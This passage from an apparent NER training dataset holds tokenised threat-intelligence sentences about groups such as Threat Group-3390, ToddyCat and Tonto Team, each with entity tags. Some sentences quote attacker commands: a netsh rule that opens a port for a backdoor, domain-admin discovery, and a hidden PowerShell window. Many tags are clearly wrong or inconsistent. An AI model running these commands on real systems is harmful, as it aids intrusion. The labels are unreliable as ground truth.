[ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "White", "Company", "has", "used", "phishing", "lure", "documents", "that", "trick", "users", "into", "opening", "them", "and", "infecting", "their", "computers." ], "ner_tags": [ "O", "I-Org", "I-Org", "O", "O", "B-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "White", "Company", "has", "checked", "for", "specific", "antivirus", "products", "on", "the", "target’s", "computer,", "including", "Kaspersky,", "Quick", "Heal,", "AVG,", "BitDefender,", "Avira,", "Sophos,", "Avast!,", "and", "ESET." ], "ner_tags": [ "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "The", "White", "Company", "has", "obfuscated", "their", "payloads", "through", "packing." ], "ner_tags": [ "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "White", "Company", "has", "sent", "phishing", "emails", "with", "malicious", "Microsoft", "Word", "attachments", "to", "victims." ], "ner_tags": [ "O", "I-Org", "I-Org", "O", "O", "B-Way", "I-Way", "O", "O", "I-SamFile", "I-SamFile", "B-SecTeam", "O", "O" ] }, { "tokens": [ "The", "White", "Company", "has", "checked", "the", "current", "date", "on", "the", "victim", "system." ], "ner_tags": [ "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-1314", "actors", "used", "compromised", "domain", "credentials", "for", "the", "victim's", "endpoint", "management", "platform,", "Altiris,", "to", "move", "laterally." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-1314", "actors", "mapped", "network", "drives", "using", "<code>net", "use</code>." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-1314", "actors", "used", "a", "victim's", "endpoint", "management", "platform,", "Altiris,", "for", "lateral", "movement." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-1314", "actors", "spawned", "shells", "on", "remote", "systems", "on", "a", "victim", "network", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "RAR", "to", "compress,", "encrypt,", "and", "password-protect", "files", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "use", "at", "to", "schedule", "tasks", "to", "run", "self-extracting", "RAR", "archives,", "which", "install", "HTTPBrowser", "or", "PlugX", "on", "other", "victims", "on", "a", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Tool", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "ran", "a", "command", "to", "compile", "an", "archive", "of", "file", "types", "of", "interest", "from", "the", "victim", "user's", "directories." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Threat", "Group-3390", "tool", "can", "use", "a", "public", "UAC", "bypass", "method", "to", "elevate", "privileges." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "obtained", "stolen", "valid", "certificates,", "including", "from", "VMProtect", "and", "the", "Chinese", "instant", "messaging", "application", "Youdu,", "for", "their", "operations." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "B-Purp", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "compromised", "the", "Able", "Desktop", "installer", "to", "gain", "access", "to", "victim's", "environments." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "performed", "DLL", "search", "order", "hijacking", "to", "execute", "their", "payload." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "DLL", "side-loading,", "including", "by", "using", "legitimate", "Kaspersky", "antivirus", "variants", "as", "well", "as", "`rc.exe`,", "a", "legitimate", "Microsoft", "Resource", "Compiler." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "have", "split", "RAR", "files", "for", "exfiltration", "into", "parts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "ran", "a", "command", "to", "compile", "an", "archive", "of", "file", "types", "of", "interest", "from", "the", "victim", "user's", "directories." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "execution,", "Threat", "Group-3390", "malware", "deobfuscates", "and", "decompresses", "code", "that", "was", "encoded", "with", "Metasploit’s", "shikata_ga_nai", "encoder", "as", "well", "as", "compressed", "with", "LZNT1", "compression." ], "ner_tags": [ "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "appcmd.exe", "to", "disable", "logging", "on", "a", "victim", "server." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "registered", "domains", "for", "C2." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "extensively", "used", "strategic", "web", "compromises", "to", "target", "victims." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "embedded", "malicious", "code", "into", "websites", "to", "screen", "a", "potential", "victim's", "IP", "address", "and", "then", "exploit", "their", "browser", "if", "they", "are", "of", "interest." ], "ner_tags": [ "O", "B-HackOrg", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Threat", "Group-3390", "tool", "can", "encrypt", "payloads", "using", "XOR.", "Threat", "Group-3390", "malware", "is", "also", "obfuscated", "using", "Metasploit’s", "shikata_ga_nai", "encoder", "as", "well", "as", "compressed", "with", "LZNT1", "compression." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "exfiltrated", "stolen", "data", "to", "Dropbox." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Threat", "Group-3390", "has", "exploited", "the", "Microsoft", "SharePoint", "vulnerability", "CVE-2019-0604", "and", "CVE-2021-26855,", "CVE-2021-26857,", "CVE-2021-26858,", "and", "CVE-2021-27065", "in", "Exchange", "Server." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "I-Exp", "O", "B-Exp", "B-Features", "O", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "exploited", "CVE-2018-0798", "in", "Equation", "Editor." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "CVE-2014-6324", "and", "CVE-2017-0213", "to", "escalate", "privileges." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "exploited", "MS17-010", "to", "move", "laterally", "to", "other", "systems", "on", "the", "network." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "look", "for", "and", "use", "VPN", "profiles", "during", "an", "operation", "to", "access", "the", "network", "using", "external", "VPN", "services.", "Threat", "Group-3390", "has", "also", "obtained", "OWA", "account", "credentials", "during", "intrusions", "that", "it", "subsequently", "used", "to", "attempt", "to", "regain", "access", "when", "evicted", "from", "a", "victim", "network." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "deleted", "existing", "logs", "and", "exfiltrated", "file", "archives", "from", "a", "victim." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "downloaded", "additional", "malware", "and", "tools,", "including", "through", "the", "use", "of", "`certutil`,", "onto", "a", "compromised", "host", "." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "installed", "a", "credential", "logger", "on", "Microsoft", "Exchange", "servers.", "Threat", "Group-3390", "also", "leveraged", "the", "reconnaissance", "framework,", "ScanBox,", "to", "capture", "keystrokes." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "have", "used", "gsecdump", "to", "dump", "credentials.", "They", "have", "also", "dumped", "credentials", "from", "domain", "controllers." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "have", "used", "a", "modified", "version", "of", "Mimikatz", "called", "Wrapikatz", "to", "dump", "credentials.", "They", "have", "also", "dumped", "credentials", "from", "domain", "controllers." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "<code>net", "user</code>", "to", "conduct", "internal", "discovery", "of", "systems." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "locally", "staged", "encrypted", "archives", "for", "later", "exfiltration", "efforts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "lured", "victims", "into", "opening", "malicious", "files", "containing", "malware." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "A", "Threat", "Group-3390", "tool", "has", "created", "new", "Registry", "keys", "under", "`HKEY_CURRENT_USER\\Software\\Classes\\`", "and", "`HKLM\\SYSTEM\\CurrentControlSet\\services`." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "use", "the", "Hunter", "tool", "to", "conduct", "network", "service", "discovery", "for", "vulnerable", "systems." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "detached", "network", "shares", "after", "exfiltrating", "files,", "likely", "to", "evade", "detection." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "obtained", "a", "KeePass", "database", "from", "a", "compromised", "host." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "PowerShell", "for", "execution." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "A", "Threat", "Group-3390", "tool", "can", "spawn", "`svchost.exe`", "and", "inject", "the", "payload", "into", "that", "process." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Threat", "Group-3390", "tool", "can", "read", "and", "decrypt", "stored", "Registry", "values." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390's", "malware", "can", "add", "a", "Registry", "key", "to", "`Software\\Microsoft\\Windows\\CurrentVersion\\Run`", "for", "persistence." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "moved", "staged", "encrypted", "archives", "to", "Internet-facing", "servers", "that", "had", "previously", "been", "compromised", "with", "China", "Chopper", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "the", "<code>net", "view</code>", "command." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "have", "used", "gsecdump", "to", "dump", "credentials.", "They", "have", "also", "dumped", "credentials", "from", "domain", "controllers." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "packed", "malware", "and", "tools,", "including", "using", "VMProtect." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "e-mail", "to", "deliver", "malicious", "attachments", "to", "victims." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "use", "NBTscan", "to", "discover", "vulnerable", "systems." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "`net", "use`", "and", "`netstat`", "to", "conduct", "internal", "discovery", "of", "systems.", "The", "group", "has", "also", "used", "`quser.exe`", "to", "identify", "existing", "RDP", "sessions", "on", "a", "victim." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "`whoami`", "to", "collect", "system", "user", "information." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "obtained", "and", "used", "tools", "such", "as", "Impacket,", "pwdump,", "Mimikatz,", "gsecdump,", "NBTscan,", "and", "Windows", "Credential", "Editor." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "compromised", "third", "party", "service", "providers", "to", "gain", "access", "to", "victim's", "environments." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "I-Org", "I-Org", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "hosted", "malicious", "payloads", "on", "Dropbox." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Threat", "Group-3390", "has", "staged", "tools,", "including", "gsecdump", "and", "WCE,", "on", "previously", "compromised", "websites." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Threat", "Group-3390", "actors", "obtain", "legitimate", "credentials", "using", "a", "variety", "of", "methods", "and", "use", "them", "to", "further", "lateral", "movement", "on", "victim", "networks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "malware", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "a", "variety", "of", "Web", "shells." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "command-line", "interfaces", "for", "execution." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Threat", "Group-3390", "tool", "can", "use", "WMI", "to", "execute", "a", "binary." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390", "has", "used", "WinRM", "to", "enable", "remote", "execution." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "Group-3390's", "malware", "can", "create", "a", "new", "service,", "sometimes", "naming", "it", "after", "the", "config", "information,", "to", "gain", "persistence." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Thrip", "has", "used", "WinSCP", "to", "exfiltrate", "data", "from", "a", "targeted", "organization", "over", "FTP." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Thrip", "leveraged", "PowerShell", "to", "run", "commands", "to", "download", "payloads,", "traverse", "the", "compromised", "networks,", "and", "carry", "out", "reconnaissance." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-HackOrg", "B-Features", "I-Features", "I-Features", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Thrip", "used", "a", "cloud-based", "remote", "access", "software", "called", "LogMeIn", "for", "their", "attacks." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-OffAct" ] }, { "tokens": [ "Thrip", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz", "and", "PsExec." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "ToddyCat", "has", "leveraged", "xcopy,", "7zip,", "and", "RAR", "to", "stage", "and", "compress", "collected", "documents", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "run", "scripts", "to", "collect", "documents", "from", "targeted", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prior", "to", "executing", "a", "backdoor", "ToddyCat", "has", "run", "`cmd", "/c", "start", "/b", "netsh", "advfirewall", "firewall", "add", "rule", "name=\"SGAccessInboundRule\"", "dir=in", "protocol=udp", "action=allow", "localport=49683`", "to", "allow", "the", "targeted", "system", "to", "receive", "UDP", "packets", "on", "port", "49683." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "run", "`net", "user", "%USER%", "/dom`", "for", "account", "discovery." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "compromised", "domain", "admin", "credentials", "to", "mount", "local", "network", "shares." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "executed", "`net", "group", "\"domain", "admins\"", "/dom`", "for", "discovery", "on", "compromised", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "a", "DropBox", "uploader", "to", "exfiltrate", "stolen", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "ToddyCat", "has", "exploited", "the", "ProxyLogon", "vulnerability", "(CVE-2021-26855)", "to", "compromise", "Exchange", "Servers", "at", "multiple", "organizations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Features", "B-Exp", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "run", "scripts", "to", "enumerate", "recently", "modified", "documents", "having", "either", "a", ".pdf,", ".doc,", ".docx,", ".xls", "or", ".xlsx", "extension." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "ToddyCat", "has", "hidden", "malicious", "scripts", "using", "`powershell.exe", "-windowstyle", "hidden`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "the", "name", "`debug.exe`", "for", "malware", "components." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "`WinExec`", "to", "execute", "commands", "received", "from", "C2", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "a", "passive", "backdoor", "that", "receives", "commands", "with", "UDP", "packets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "Powershell", "scripts", "to", "perform", "post", "exploit", "collection." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "run", "`cmd", "/c", "start", "/b", "tasklist`", "to", "enumerate", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "manually", "transferred", "collected", "files", "to", "an", "exfiltration", "host", "using", "xcopy." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ToddyCat", "has", "used", "`ping", "%REMOTE_HOST%`", "for", "post", "exploit", "discovery." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "locally", "mounted", "network", "shares", "for", "lateral", "movement", "through", "targated", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "scheduled", "tasks", "to", "execute", "discovery", "commands", "and", "scripts", "for", "collection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "can", "determine", "is", "Kaspersky", "software", "is", "running", "on", "an", "endpoint", "by", "running", "`cmd", "/c", "wmic", "process", "where", "name=\"avp.exe\"`." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "B-SamFile" ] }, { "tokens": [ "ToddyCat", "has", "sent", "loaders", "configured", "to", "run", "Ninja", "as", "zip", "archives", "via", "Telegram." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "collected", "information", "on", "bootable", "drives", "including", "model,", "vendor,", "and", "serial", "numbers." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "`netstat", "-anop", "tcp`", "to", "discover", "TCP", "connections", "to", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", ".bat", "scripts", "and", "`cmd`", "for", "execution", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ToddyCat", "has", "used", "WMI", "to", "execute", "scripts", "for", "post", "exploit", "document", "collection." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "abuses", "a", "legitimate", "and", "signed", "Microsoft", "executable", "to", "launch", "a", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "exploited", "Microsoft", "vulnerabilities,", "including", "CVE-2018-0798,", "CVE-2018-8174,", "CVE-2018-0802,", "CVE-2017-11882,", "CVE-2019-9489", "CVE-2020-8468,", "and", "CVE-2018-0798", "to", "enable", "execution", "of", "their", "delivered", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Features", "B-Features", "B-Features", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "exploited", "CVE-2019-0803", "and", "MS16-032", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Features", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "used", "EternalBlue", "exploits", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Features", "B-Exp", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "routed", "their", "traffic", "through", "an", "external", "server", "in", "order", "to", "obfuscate", "their", "location." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-OffAct", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "downloaded", "malicious", "DLLs", "which", "served", "as", "a", "ShadowPad", "loader." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "used", "keylogging", "tools", "in", "their", "operations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "used", "the", "<code>ShowLocalGroupDetails</code>", "command", "to", "identify", "administrator,", "user,", "and", "guest", "accounts", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "relied", "on", "user", "interaction", "to", "open", "their", "malicious", "RTF", "documents." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "used", "tools", "such", "as", "NBTscan", "to", "enumerate", "network", "shares." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { 